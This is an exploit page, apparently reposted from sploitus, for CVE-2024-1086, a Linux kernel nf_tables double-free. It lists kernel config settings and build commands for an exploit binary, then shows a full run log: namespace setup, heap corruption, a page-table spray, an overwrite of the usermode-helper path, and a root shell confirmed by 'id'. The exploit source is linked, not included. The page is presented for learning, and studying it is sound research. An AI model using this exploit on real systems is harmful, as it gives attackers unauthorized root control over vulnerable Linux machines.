Share
## https://sploitus.com/exploit?id=4562CED5-A8AE-5468-B3D0-19213699DB21
# CVE-2024-1086
For learning purpose.
Refer:
- https://pwning.tech/nftables/
- https://github.com/Notselwyn/CVE-2024-1086
Kconfig:
```diff
+CONFIG_CONFIGFS_FS=y
+CONFIG_SECURITYFS=y
+CONFIG_NF_TABLES=y
# mnl_cb_run: Operation not supported
+CONFIG_NETFILTER_NETLINK_GLUE_CT=y
+CONFIG_NETLINK_DIAG=y
+CONFIG_NFT_CT=y
+CONFIG_NF_TABLES_IPV4=y
-CONFIG_X86_5LEVEL=y
+CONFIG_PGTABLE_LEVELS=4
+CONFIG_STATIC_USERMODEHELPER=y
+CONFIG_STATIC_USERMODEHELPER_PATH="/sbin/usermode-helper"
-CONFIG_SLAB_MERGE_DEFAULT=y
+CONFIG_SLAB_FREELIST_RANDOM=y
+CONFIG_SLAB_FREELIST_HARDENED=y
+CONFIG_SHUFFLE_PAGE_ALLOCATOR=y
-CONFIG_KASAN=y
-CONFIG_KASAN_GENERIC=y
-CONFIG_KASAN_INLINE=y
-CONFIG_KASAN_STACK=y
```
Build:
```bash
apt install -y libnftnl-dev libmnl-dev
gcc exp.c -o exp -lnftnl -lmnl
```
Exp ๐ป:
```
test@syzkaller:~$ uname -a
Linux syzkaller 6.3.0-00001-ge449dbb06b7b #31 SMP PREEMPT_DYNAMIC Mon Dec 16 23:45:41 CST 2024 x86_64 GNU/Linux
test@syzkaller:~$ ./exp
[+] creating user namespace (CLONE_NEWUSER)...
[+] creating network namesapce (CLONE_NEWNET)...
[+] setting up UID namespace...
[+] mapping uid 1000 to namespace uid 0...
[+] deny namespace rights to set user groups...
[+] mapping gid 1000 to namespace gid 0...
[+] configuring localhost in namespace...
[+] disbaling RPF in network namespace...
[+] disabling rpf for interface: 'lo'
[+] disabling rpf for interface: 'sit0'
[+] setting up nftables...
[+] allocating netfilter objects...
[+] sending nftables tables/chains/rules/expr using netlink...
[+] running normal privesc
[+] doing first useless allocs to setup caching and stuff..
[+] allocated VMAs for process:
- pte_area: ?
- _pmd_area: 0x80000000
- modprobe_path: '/sbin/modprobe' @ 0x7ffdfb220ea0
[+] sending intermediate buffer packet...
[+] sending IP packet (32796 bytes)...
[+] waiting for the clam before the storm...
[+] start to reserve udp packets 170
[+] sending double free buffer packet...
[+] sending IP packet (32796 bytes)...
[+] start to free reserved udp packets to mask corrupted packet 170
[+] spraying 16000 pte's...
[+] double-freeing skb...
[+] sending intermediate buffer packet...
[+] sending IP packet (20 bytes)...
[ 78.851572] ------------[ cut here ]------------
[ 78.851936] WARNING: CPU: 0 PID: 218 at mm/slab_common.c:935 free_large_kmalloc+0x5e/0x90
[ 78.852409] Modules linked in:
[ 78.852692] CPU: 0 PID: 218 Comm: exp Not tainted 6.3.0-00001-ge449dbb06b7b #31
[ 78.852867] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
[ 78.852867] RIP: 0010:free_large_kmalloc+0x5e/0x90
[ 78.853565] Code: 45 00 be 06 00 00 00 48 c1 e8 3a 48 8b 3c c5 e0 cf c9 82 e8 64 5e ff ff 44 89 e6 48 89 ef 48 83 c4 08 5d 41 5c e9 12 44 03 00 <0f> 0b 45 31 e4 80 3d a7 0c a7 01 00 48 c78
[ 78.854277] RSP: 0018:ffff88813bc05d20 EFLAGS: 00000246
[ 78.854470] RAX: 0200000000000000 RBX: 0000000000000000 RCX: 0000000000000000
[ 78.854641] RDX: 0000000000000000 RSI: ffff88810ab10000 RDI: ffffea00042ac400
[ 78.854806] RBP: ffffea00042ac400 R08: ffff88810aab7450 R09: 0000000000000001
[ 78.855119] R10: ffff88810018d490 R11: ffff88813bc2b270 R12: 0000000000000002
[ 78.855291] R13: ffff88810aabd900 R14: ffff88810aab7450 R15: 0000000000000014
[ 78.855509] FS: 00007f09941f8740(0000) GS:ffff88813bc00000(0000) knlGS:0000000000000000
[ 78.855731] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 78.856008] CR2: 00000087cfe00000 CR3: 0000000102fd0000 CR4: 00000000000006f0
[ 78.856305] Call Trace:
[ 78.857067] <IRQ>
[ 78.857449] skb_release_data+0xea/0x1c0
[ 78.857695] kfree_skb_reason+0x4b/0x110
[ 78.857801] inet_frag_rbtree_purge+0x4f/0x80
[ 78.858405] inet_frag_destroy+0x49/0x80
[ 78.858535] ip_defrag+0x4ce/0x840
[ 78.858644] ip_local_deliver+0x50/0x120
[ 78.858928] ? ip_rcv+0xd7/0x170
[ 78.859032] __netif_receive_skb_one_core+0x86/0xa0
[ 78.859181] process_backlog+0x98/0x140
[ 78.859280] __napi_poll+0x27/0x1b0
[ 78.859390] net_rx_action+0x28a/0x2e0
[ 78.859483] __do_softirq+0xc0/0x290
[ 78.859625] do_softirq+0x62/0x90
[ 78.859932] </IRQ>
[ 78.860011] <TASK>
[ 78.860064] __local_bh_enable_ip+0x59/0x70
[ 78.860197] ip_finish_output2+0x182/0x500
[ 78.860429] ? __pfx_ip_finish_output+0x10/0x10
[ 78.860578] raw_sendmsg+0xccb/0xce0
[ 78.860696] ? common_interrupt+0x13/0xa0
[ 78.860812] ? __pfx_dst_output+0x10/0x10
[ 78.860831] ? sock_sendmsg+0x8a/0xa0
[ 78.860831] ? __pfx_raw_sendmsg+0x10/0x10
[ 78.860831] sock_sendmsg+0x8a/0xa0
[ 78.860831] ? move_addr_to_kernel.part.0+0x16/0x60
[ 78.860831] __sys_sendto+0xfb/0x170
[ 78.860831] ? vfs_write+0x1a8/0x3a0
[ 78.860831] __x64_sys_sendto+0x1f/0x30
[ 78.861832] do_syscall_64+0x3f/0x90
[ 78.861944] entry_SYSCALL_64_after_hwframe+0x72/0xdc
[ 78.862257] RIP: 0033:0x7f09942f8046
[ 78.862593] Code: 0e 0d 00 f7 d8 64 89 02 48 c7 c0 ff ff ff ff eb b8 0f 1f 00 41 89 ca 64 8b 04 25 18 00 00 00 85 c0 75 11 b8 2c 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 72 c3 90 55 48 83 ec9
[ 78.863251] RSP: 002b:00007ffdfb220d88 EFLAGS: 00000246 ORIG_RAX: 000000000000002c
[ 78.863490] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f09942f8046
[ 78.863637] RDX: 0000000000000014 RSI: 0000557f4b4e6300 RDI: 0000000000000005
[ 78.863786] RBP: 00007ffdfb220db0 R08: 00007ffdfb220de0 R09: 0000000000000010
[ 78.864158] R10: 0000000000000000 R11: 0000000000000246 R12: 0000557f4b4e05b0
[ 78.864496] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
[ 78.864863] </TASK>
[ 78.865130] ---[ end trace 0000000000000000 ]---
[ 78.865559] object pointer: 0x00000000f3fec870
[+] checking 16000 sprayed pte's for overlap...
[+] confirmed double alloc PMD/PTE
- PTE area index: 68
- PTE area (write target address/page: 8000000111fcc067 (new)
[+] flush tlb thread gonna sleep
- PMD area (read target value/page): f000ff53f000ff53 (new)
[ 78.979646] memfd_create() without MFD_EXEC nor MFD_NOEXEC_SEAL, pid=218 'exp'
[+] flush tlb thread gonna sleep
[+] found possible physical kernel base: 0000000001000000
[+] flush tlb thread gonna sleep
[+] flush tlb thread gonna sleep
[+] flush tlb thread gonna sleep
[+] flush tlb thread gonna sleep
[+] flush tlb thread gonna sleep
[+] flush tlb thread gonna sleep
[+] flush tlb thread gonna sleep
[+] flush tlb thread gonna sleep
[+] flush tlb thread gonna sleep
[+] flush tlb thread gonna sleep
[+] flush tlb thread gonna sleep
[+] flush tlb thread gonna sleep
[+] verified modprobe_path/usermodehelper_path: 000000000268611c ('/sbin/usermode-helper')...
[+] overwriting path with PIDs in range 0->4194304...
[ 80.401031] process 'exp' launched '/dev/fd/13' with NULL argv: empty string added
[ 80.711688] audit: type=1400 audit(1734370080.435:6): avc: denied { write } for pid=451 comm="11" name="fd" dev="proc" ino=885 scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:1
[ 80.712534] audit: type=1400 audit(1734370080.435:7): avc: denied { add_name } for pid=451 comm="11" name="12" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_1
[ 80.712810] audit: type=1400 audit(1734370080.436:8): avc: denied { create } for pid=451 comm="11" name="12" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:object_r:kernel_t:1
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:kernel_t:s0
# exit
[+] successfully breached the mainframe as read-PID 218
```